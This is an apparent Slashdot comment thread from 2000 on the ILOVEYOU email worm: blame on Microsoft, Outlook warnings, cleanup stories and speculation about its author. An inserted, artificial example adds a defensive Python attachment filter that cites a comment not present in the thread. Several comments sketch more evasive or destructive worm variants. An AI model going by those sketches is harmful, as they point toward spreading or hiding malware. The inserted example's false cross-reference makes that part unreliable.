This isn't of course forgetting (OSS)sendmail's many security holes... it also is high-exposure, and often runs as root(0)... Why bother with file permissions when you've got an exploit letting you become God?
Okay, it's easy when a Windows user is root by default.
What I'm saying is:
It's not just M$ / closed software which is vulnerable to this kind of exploit; anything in wide use is the main target.
This means that OSS is far from invincible to this kind of attack - especially as it gets more popular - sendmail is an old and tried example of this. Worth bearing in mind before we slam Closed / M$ software for being so buggy
This doesn't excuse M$ for allowing Outlook to run these scripts any more than it excuses sendmail authors from their responsibility.
Yrs, Steve.
Author, Shell Scripting : Expert Re
As soon as somebody says "email virus" all the slashdotters go up in flames about how bad M$ is and how Outlook and VB are the root of all evil (which may be true of VB but I digress).
If you would take more than 2 seconds to look at the ACTUAL FACTS (*mass intake of breath*) you'd see that this is a trojan, that is spread by people running attachments... WOW! OH MY GOD! ATTACHMENTS CAN COME TO OTHER EMAIL CLIENTS!!!! Who'da thunk it? Damned microsoft, it must be their fault... How could anything bad not be microsoft's fault???
Clowns.
Now watch me get moderated into oblivion for not bagging MS.
-Gfunk
Send lawyers, guns, and money!
Somebody gonna give us an absolute on this?
Don't do email in winderz myself, so I don't know
- only do M$Word - also Melissable! M$'s file formats aren't open... If I've received an email from someone, I want it to be readable whatever OS / mail client I'm in - so Winderz can't see Linux partitions, so I don't do email in winders.
Author, Shell Scripting : Expert Re
What about the journalists that report it?? I've sent the following off to the BBC, in hopes that MicroSoft will shoulder its share of the blame. I encourage the rest of you to send similar messages to the BBC and to other news organizations whose coverage is similarly incomplete.
-------------
From: L. Adrian Griffis <adrian@idir.net>
To: newsonline@bbc.co.uk
Subject: Missing the Point Regarding the "ILOVEYOU" Virus.
While I'm delighted to see some substantial details in your coverage of
the tour of the "ILOVEYOU" virus, I'm disappointed that you haven't
pointed the finger at the one organization that should carry most of the
blame. That organization is MicroSoft.
Don't get me wrong, I'm appalled at the kind of attitude that must be
behind a decision to release this virus. But MicroSoft's 20 years of
reckless and perverse disregard for the safety of their customers' data
is the central theme in all of these virus incidents. In the Unix/Linux
world, when a vulnerability is discovered in an email client, it is
acknowledged as a bug and corrected. It would never occur to us to
tolerate a product that continues, release after release, with the same
flawed design from a vendor that won't even acknowledge the flaws. It
astonishes me that the MicroSoft Windows community never even cries foul
when they find that MicroSoft has, once again, held their pants down
during yet another attack. It astonishes me further that this same
community thinks it quite natural to spend money on a third party
product (a virus scanner) whose purpose is to shield this system, that
the first vendor won't lift a finger to fix, from the malicious data
that exploits the first vendor's neglect.
Why haven't I seen a single negative comment about MicroSoft's role in
this crisis?
Thanks
Adrian
All I did to stop the effects of this is...
1) Open Folder Options
2) Go to File Extensions
3) Disassociate vbs files from all apps--in other words, delete the file extension
------------
Tonight on Fox: Deadliest Executions Part XVII
Or type his variables~
---
McAfee did have an updated dat file for the virus around 10am this morning. I'm sure the hotmail people have updated their scanning service accordingly.
Due to the overwhelming ease with which the source code for this trojan is available, get ready for the script kiddie Exchange DoS. Any one of a million variants will be showing up on your mail server soon. --mr
Good Mornings!
I'm surprised that no one has mentioned Samba yet......we (UNIX group) got hit through a (Samba)mapped drive to a UNIX server. Luckily we caught it almost immediately. Did a shutdown and then came up in single user mode with the ethernet cable yanked (can you say paranoia?) Disabled the samba server and removed it from startup. Did a find to identify overwritten files (piped to a text file to document for users) and then deleted. I can also see this trojan getting unintentionally propagated through UNIX servers by people with windows "hide file extensions" turned on while FTPing through a GUI client. Next (windows) user comes along and downloads it (GUI windows client) and BLAM!
What if someone rewrites this virus so that instead of sending itself with the same name to everyone in the address book, it would make sure every email sent has a different title and different name of the attachment? The virus could perhaps open some Word documents on the infected hard drive and randomly select some sentences. This way it could even localize itself, so that it would use a Swedish subject in Sweden, a Thai subject in Thailand, and a Portuguese subject in Brazil.
The really bad thing with such a virus would be that prevention would be much harder. All you can say is: Don't open email attachments if they are sent to you from someone you know!
In a way I really hope someone writes such a virus, since it would make it so obvious what crap products Microsoft makes.
Mats
Thus, we must put XML in the kernel. That would solve the problem. And tech-savvy CTO's know it. If Linux is to compete with other operating systems, it must put XML in the kernel. Security is a distraction. It's all XML these days.
I am not a lawyer.
I didn't realize Microsoft was in Egypt, because this guy's clearly in denial.
I wonder if anybody is going to bring a class action suit against Microsoft for not closing this security hole back when Melissa came out.
www.eFax.com are spammers
Why stop there? Why just make it seem as if MP3s were being deleted, instead of actually zapping them? If I really wanted to do some serious damage, I'd have written it to take out executables -- or worse, harder-to-replace documents such as word processor files, spreadsheets, Powerpoint presentations...hey, even settings for "The Sims".
It seems that this virus was meant to do just enough damage to make a point about security, rather than be seriously crippling. Either that, or the writer fears that if the damage was worse, he'd be in even deeper crap with the authorities.
Opinions?
If you want to get people to change their behavior you have to do more than tell them to stop the "bad" behavior. You have to give them a "good" alternative.
Instead of saying "I told you Microsoft was bad." we should be saying "Switch to Linux so you won't be vulnerable to this class of attack."
(Sure there are attacks that are possible on Linux. But they're fewer, and a damned sight harder to pull off. Microsoftware, on the other hand, has gaping holes all over the place, and no way for anybody who doesn't work for Bill's company, or hand-in-glove with it, to fix them.)
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
Oh well. At least it gives me one more thing to laugh at - two, really: the fuckwits who get hit by it, and the even greater fuckwits who think it's some kind of global emergency. I mean, really, most wars don't get this much attention. And it's not like people don't have a choice about getting the virus...
A Flu epidemic? Sure, that's news. ILOVEYOU? Gimme a fuckin break.
I received this from a friend this morning:
I'm sure by now you've all heard of the 'ILOVEYOU' e-mail virus. Well, on
hearing about this in the news first thing this morning, an unnamed manager
physically disconnected (without the sysadmin knowing) the mail server to
'protect' our LAN - so the virus had a fantastic, if unintended DoS effect
on our organisation at least. As an added bonus, the mail server which was
disconnected was also the authentication server for our network, so logins
and various network apps failed, and made for one happy sysadmin.
Let me share with you a couple of e-mails everyone received a little later
this morning, once the mail servers were brought back:
---------------------------
From: an unknown manager
Subject: ILOVEYOU virus
Attention all staff,
If you have received any e-mails with a subject line containing "ILOVEYOU",
DO NOT OPEN.
Delete this e-mail immediately and contact the IT Help desk on xxxx.
Thank you
The unknown manager
----------------------------
This came half an hour later:
----------------------------
From: the unknown manager
Subject: Virus alert correction
All Staff,
It has come to my attention that some staff may not have opened my last
e-mail because of the subject line, so I'm repeating it here:
If you have received any e-mails with a subject line containing "ILOVEYOU",
DO NOT OPEN.
Delete this e-mail immediately and contact the IT Help desk on xxxxx.
Thank you
The unknown manager
---------------------------------
After that correction to the original, another problem remained - everyone
took 'this email' in the correct grammatical sense and immediately deleted
the warning e-mail and called the IT helpdesk. Best laugh I've had in a
long time.....
> the presence of the code on Slashdot.org
/. post with IE5?
Is there any truth to the rumor that you can catch the virus by reading the
--
Sheesh, evil *and* a jerk. -- Jade
The creator was, as the old cliche states, either very smart or very stupid.
If the 'very stupid' scenario is the case then I'd be willing to bet that rather than "laughing themselves off their chairs" they are more likely shitting themselves. They know as well as you and I that they will be caught. They included way too much information.
for example "rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines"
and the references to
www.skyinet.net
Sky Internet,Inc.
L/G Victoria I Bldg. 1670 Quezon Ave.
Quezon, Ph 1103
8000
+63 2 411-2005
Fax- +63 2 411-2003
and the 4 users of Sky Internet, Inc. (chu, angelcat, young1s, and koichi).
I'm sure someone will be able to make the connection between all of this.
OR this guy was smart enough to select sky internet and grammersoft at random and has no connection whatsoever with these companies.
Either way I hope he's caught, it'll be interesting to see what his punishment is
-Znix
Think of what sense this makes. So, every time a program changes anything on a system, it needs the user's confirmation? Just THINK about this for ten seconds. Think of programs you use on a daily basis. Think of how many things they change on your hard drive. Do you want a prompt for every single one of those!?
Oh, yeah, also: Outlook ALREADY WARNS YOU if you try to open an executable attachment. But the people spreading this virus ignore the warnings and run it anyway. Stupid people are the problem, here.
-------------
The following sentence is true. The preceding sentence was false.
Pretty scary... I heard on CNNHN that some European photo archives had lost a lot of data due to the trojan overwriting jpg files... I wonder how many people had their .mp3 collections toasted :).
...unfortunately no one can be told what The Mat^H^H^HGoatse is...they must experience it for themselves...
Alright, I wrote a small vbs file and emailed it to myself, to see if any of the FUD here is true.
First of all, IT DOES *NOT* EXECUTE AUTOMATICALLY IN THE PREVIEW PANE!!! I don't know what you people are talking about! I have to click on the attachment-button, then click on "Excel.VBS" in the drop-down menu.
It then pops up a dialog that says:
"Open Attachment Warning
Opening:
EXCEL.VBS
Some files can contain viruses or otherwise be harmful to your computer. It is important to be certain that this file is from a trustworthy source.
What would you like to do with this file?
[ ] Open it
[x] Save it to disk
[x] Always ask before opening this type of file"
You have to choose "Open it" then click "OK", then it runs.
That's a pretty stern warning, but people ignore it because it's from someone they know. You would think that people would learn after the Melissa worm. Don't run ANY files you receive in email without confirmation first.
-------------
The following sentence is true. The preceding sentence was false.
1) "This script is attempting to send mail, would you like to allow it?"
2) "This script is attempting to modify the hard disk, would you like to allow it?"
3) "This script is attempting to modify your startup programs, would you like to allow it?"
Pretty easy, ne? Maybe I should email them :P
-------------
The following sentence is true. The preceding sentence was false.
Ok, I must have misread you.
Actually, I think I agree with you. Specifically to these problems (script or macro based email worms), there are three things I see where there should be at least a user confirmation, if not a complete restriction of the script:
1) Attempting to send email (maybe it can write it, but the user has to send it)
2) Attempting to modify the disk
3) Attempting to modify startup programs or other programs' registry settings (already somewhat protected in NT, but not enough)
-------------
The following sentence is true. The preceding sentence was false.
Microsoft Press announced today the release of a new software package, titled "Microsoft Outlook". This tool kit, reviewed by many and considered to be yet another attempt by Microsoft to branch into alternate software development paths previously unexplored, has the creators of the popular "Virus Creation Lab" worried. "This could put me out of a job," claimed one respondent, who preferred to remain anonymous. Microsoft seems confident that their software will be recognized for what it is, an attempt to provide users of Windows 98, Windows NT, and Windows 2000 with the capacity to create and test viruses, in the comfort of their own home. The software includes a scripting language, several virus templates, and rigorous testing utilities designed to maximize the effect of any virus scripted by the user. It also included an integrated e-mail client. Microsoft will begin releasing a free version of the software next week, known as Outlook Express. This version includes a few sample templates, a smaller version of the tool kit, the scripting language, and the integrated e-mail client. The user will have the option to upgrade to the full version of Outlook for a small charge.
Alari Hyena
... I wonder if The Onion is hiring...
I use Windows... like a two dollar wh.. why don't I just go ahead and not finish that sentence.
To everyone who says that the solution is to tell people not to open unknown attachments, maybe there is more to the problem/solution than that... I found the name of the vbs file to be probably the best-engineered part of the virus... Assume that one of your relatives or a trusted friend gets infected, and you happen to receive a note called I-LOVE-YOU. Your first impulse is to open it and see what the 'trusted' party sent to you... Everyone who uses outlook is likely to have some close friends in their address book, so this scenario is not unlikely to happen. I feel like the blanket solution of making fun of people who open email attachments won't help, for the same reason as telling children not to talk to strangers is ineffective. The child's image of a stranger is not at all what it should be for the child's safety. Most users are not trained to look at the extension of a file (some even have those extensions turned off), but none will hesitate to try to judge the contents by the main name or icon. Perhaps a better fix to this kind of problem would be better grouping of icons for security. Anything that stands a chance of getting run on a system should perhaps be assigned a more dangerous-looking icon. Also, perhaps the use of file permissions, and setting all incoming file attachments as read-only, non-executable (like you can do in *nix) would help.
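An added example, not part of any comment in this thread: comments above mention a script that cleans Unix mailspools and point out that users judge an attachment by its visible name while the real extension is hidden. The Python below flags such attachments at the mail server; the extension lists, the function names and the sample message are constructed for this illustration.

```python
import email
import os
from email import policy

# Extensions that Windows hands to an interpreter or loader on double-click.
# This list is an assumption of the example, not taken from the thread.
ACTIVE_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta",
               ".exe", ".com", ".scr", ".pif", ".bat", ".cmd"}
# Extensions a reader takes for passive data when the final one is hidden.
DECOY_EXTS = {".txt", ".jpg", ".jpeg", ".gif", ".doc", ".mp3", ".pdf"}


def classify(filename):
    """Return 'decoy-double-extension', 'active-content' or None."""
    # Windows ignores trailing dots and spaces, so "a.vbs. " still runs as .vbs.
    name = filename.strip().rstrip(". ").lower()
    stem, ext = os.path.splitext(name)
    if ext not in ACTIVE_EXTS:
        return None
    # With "hide file extensions" on, NOTE.TXT.vbs is displayed as NOTE.TXT.
    if os.path.splitext(stem)[1] in DECOY_EXTS:
        return "decoy-double-extension"
    return "active-content"


def scan_message(raw):
    """Parse one RFC 822 message; list (filename, verdict) for risky parts."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        # get_filename() reads Content-Disposition filename= and falls back
        # to the Content-Type name= parameter, decoding RFC 2231 values.
        fname = part.get_filename()
        if not fname:
            continue
        verdict = classify(fname)
        if verdict:
            findings.append((fname, verdict))
    return findings


# Constructed sample message; bodies are placeholders, not script code.
SAMPLE = """\
From: friend@example.org
To: you@example.org
Subject: constructed sample
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUND"

--BOUND
Content-Type: text/plain

see attached
--BOUND
Content-Type: application/octet-stream
Content-Disposition: attachment; filename="NOTE.TXT.vbs"

placeholder
--BOUND
Content-Type: image/jpeg
Content-Disposition: attachment; filename="holiday.jpg"

placeholder
--BOUND
Content-Type: application/octet-stream; name="Excel.VBS"

placeholder
--BOUND--
"""

if __name__ == "__main__":
    for fname, verdict in scan_message(SAMPLE):
        print(f"{verdict:24} {fname}")
```

A server-side filter built on this would quarantine or rename the flagged parts before delivery, so the decision does not depend on what the desktop chooses to display.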
There's a difference: ignorance can usually be cured. If not, it's also idiocy.
Regards to your mum from a complete stranger. <g>
Got a beef? Plug a name into the Bizarre Rumour Generator!
I just went over to www.microsoft.com - not a word about this on the home page. So I did a search on "iloveyou" - it returned 0 hits. So I went into the MS Office area of the site, just to be sure, and got exactly the same result. I just love to see MS facing up to its responsibilities. Still, at least I was able to find out about their commitment to innovation.
Using HTML in email is like putting sound effects on your phone calls. Just say <strong>no</strong>.
Colin,
:-(
Writing things like this in Visual Basic is easy.
But one of these days, some really expert programmer with a nasty intent is going to write a virus that is extremely insidious and start literally shutting down hardware that works on the various layers of the OSI networking model. Given that routers ARE computers of sorts, let's see how long before someone could bring down much of the Internet by bringing down a major backbone provider such as UUNet.
Raymond in Mountain View, CA
I can foresee it:
The warnings about this virus will still be spread on the internet, even when the last M$-Machine has been shutdown and no platform is left where the virus actually can be executed.
So effectively we now have two viruses to deal with:
1. The actual virus itself
2. The meta-virus (aka warning)
Possible Solution (Metallica Method):
Forbid e-mail
--- If OS were buildings, then the first woodpecker to come around would erase 95 % of civilization.
ILOVEYOU spread across the whole world in just a few hours. What if something like this killed the host an hour or two after infection? By the time it destructed, it would already have several generations of offspring.
---
As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
What this virus made clear to me is that the news media seems to be afraid of blaming Microsoft for having insecure products, even though they bash them daily in their coverage of the antitrust trial.
Even the Slashdot lead-in doesn't mention Windows, Outlook (aka Outhouse), or VB specifically!!!!!!! Looking at all the other mainstream and niche press coverage of the virus, Microsoft is rarely mentioned before the fourth or fifth paragraph. On Nightline last night, Ted Koppel and guests went off for half an hour on the evilness of whatever fifteen year old unleashed this thing, and they left Microsoft alone. (I think so anyway, I couldn't actually stomach watching it for more than ten seconds at a time.)
My question is, what kind of world do we want?
A) A world where a rebellious teenager can cripple email systems worldwide because the security is so weak, and then we bring down the heavy hand of "justice" on this poor child because they "caused billions of dollars in damages," in the ridiculous hope of somehow disincenting teenage rebellion in the future; or
B) A world where a rebellious teenager cannot cripple email systems worldwide, and we don't have to impose excessive fines and cruel and unusual punishments on the child, and everyone's email keeps working fine.
I vote for B.
This is just one of the reasons I do not use MS anything to communicate with the world. I use Linux.
Linux - the ultimate virus protection program
make Linux, not Microsoft. sin(beast) = -0.809016994374947424102293417182819
...quite evidently _I'm_ not in ANYONE's Outlook address book....I haven't received the virus yet!!!
....Is there a problem, Dave? asked HAL....
Of course, this could mean an arrest in 24 hours.
*Carlos: Exit Stage Right*
"Geeks, Where would you be without them?"
"Got Linux?"
Take a look at it here.
You know what to do with the HELLO.
Help create an open-source world
Yes, you're right, and so are the other 2 /.'ers who replied to my post.
:)
After I went to work and had to deal with the aftereffects of ILOVEYOU on my coworkers' computers, I found Slashdot to be a very useful resource. I was surprised nobody flamed me.
So next time I'll be sure to have some tea before complaining about a story.
Thanks, and take care,
Mike